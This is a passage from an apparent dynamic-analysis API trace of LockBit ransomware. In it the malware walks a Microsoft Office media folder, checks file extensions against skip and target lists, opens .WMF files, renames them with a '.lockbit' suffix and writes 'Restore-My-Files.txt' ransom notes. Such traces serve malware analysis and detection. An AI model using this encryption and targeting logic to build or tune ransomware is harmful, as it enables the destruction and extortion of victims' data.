(lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.240] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.240] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298897.WMF.lockbit") returned 70 [0199.240] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298897.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0298897.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.242] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.242] malloc (_Size=0x40068) returned 0x3df0008 [0199.242] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=6566) returned 1 [0199.242] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.243] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.243] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.243] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.243] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.247] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298897.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298897.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.247] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.247] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.248] free (_Block=0x1fa2ed8) [0199.248] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0298897.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.248] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.248] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.248] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15fa3200, ftCreationTime.dwHighDateTime=0x1bf2c99, ftLastAccessTime.dwLowDateTime=0xbd669c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x15fa3200, ftLastWriteTime.dwHighDateTime=0x1bf2c99, nFileSizeHigh=0x0, nFileSizeLow=0x163c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0299125.WMF", cAlternateFileName="")) returned 1 [0199.248] lstrcmpiW (lpString1=".", lpString2="J0299125.WMF") returned -1 [0199.248] lstrcmpiW (lpString1="..", lpString2="J0299125.WMF") returned -1 [0199.248] PathFindExtensionW (pszPath="J0299125.WMF") returned=".WMF" [0199.248] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.248] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.248] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.248] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.248] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.248] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.248] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.249] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.249] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0299125.WMF") returned 1 [0199.250] lstrcmpiW (lpString1="ntldr", lpString2="J0299125.WMF") returned 1 [0199.250] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0299125.WMF") returned 1 [0199.250] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0299125.WMF") returned -1 [0199.250] lstrcmpiW (lpString1="autorun.inf", lpString2="J0299125.WMF") returned -1 [0199.250] lstrcmpiW (lpString1="thumbs.db", lpString2="J0299125.WMF") returned 1 [0199.250] lstrcmpiW (lpString1="iconcache.db", lpString2="J0299125.WMF") returned -1 [0199.250] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.250] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299125.WMF") returned=".WMF" [0199.250] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.250] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.250] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.251] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.251] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299125.WMF.lockbit") returned 70 [0199.251] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299125.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299125.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.253] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.253] malloc (_Size=0x40068) returned 0x3df0008 [0199.253] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5692) returned 1 [0199.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.253] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.253] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.253] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.254] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.254] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.257] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299125.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299125.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.257] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.257] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.258] free (_Block=0x1fa2ed8) [0199.258] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299125.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.258] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.258] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.259] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x375b1e00, ftCreationTime.dwHighDateTime=0x1bf2c99, ftLastAccessTime.dwLowDateTime=0xbd669c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x375b1e00, ftLastWriteTime.dwHighDateTime=0x1bf2c99, nFileSizeHigh=0x0, nFileSizeLow=0x23b6, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0299171.WMF", cAlternateFileName="")) returned 1 [0199.259] lstrcmpiW (lpString1=".", lpString2="J0299171.WMF") returned -1 [0199.259] lstrcmpiW (lpString1="..", lpString2="J0299171.WMF") returned -1 [0199.259] PathFindExtensionW (pszPath="J0299171.WMF") returned=".WMF" [0199.259] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.259] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.260] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0299171.WMF") returned 1 [0199.260] lstrcmpiW (lpString1="ntldr", lpString2="J0299171.WMF") returned 1 [0199.260] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0299171.WMF") returned 1 [0199.260] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0299171.WMF") returned -1 [0199.260] lstrcmpiW (lpString1="autorun.inf", lpString2="J0299171.WMF") returned -1 [0199.260] lstrcmpiW (lpString1="thumbs.db", lpString2="J0299171.WMF") returned 1 [0199.260] lstrcmpiW (lpString1="iconcache.db", lpString2="J0299171.WMF") returned -1 [0199.260] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\") returned="" [0199.260] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299171.WMF") returned=".WMF" [0199.260] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0199.260] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0199.260] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0199.261] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0199.261] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299171.WMF.lockbit") returned 70 [0199.261] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299171.WMF" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\j0299171.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x330 [0199.263] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0199.263] malloc (_Size=0x40068) returned 0x3df0008 [0199.263] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=9142) returned 1 [0199.263] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.263] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.263] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0199.263] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.264] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.264] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0199.264] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.267] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299171.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299171.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0199.267] malloc (_Size=0xa2) returned 0x1fa2ed8 [0199.267] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa2, FileInformationClass=0xa) returned 0x0 [0199.281] free (_Block=0x1fa2ed8) [0199.281] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\J0299171.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10") returned 1 [0199.281] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt") returned 70 [0199.281] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\CAGCAT10\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\cagcat10\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0199.281] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa08f6100, ftCreationTime.dwHighDateTime=0x1bf2c9a, ftLastAccessTime.dwLowDateTime=0xbd669c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa08f6100, ftLastWriteTime.dwHighDateTime=0x1bf2c9a, nFileSizeHigh=0x0, nFileSizeLow=0x62c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0299587.WMF", cAlternateFileName="")) returned 1 [0199.281] lstrcmpiW (lpString1=".", lpString2="J0299587.WMF") returned -1 [0199.281] lstrcmpiW (lpString1="..", lpString2="J0299587.WMF") returned -1 [0199.281] PathFindExtensionW (pszPath="J0299587.WMF") returned=".WMF" [0199.281] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0199.281] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0199.281] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0199.282] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0199.282] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0199.283] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0199.283] 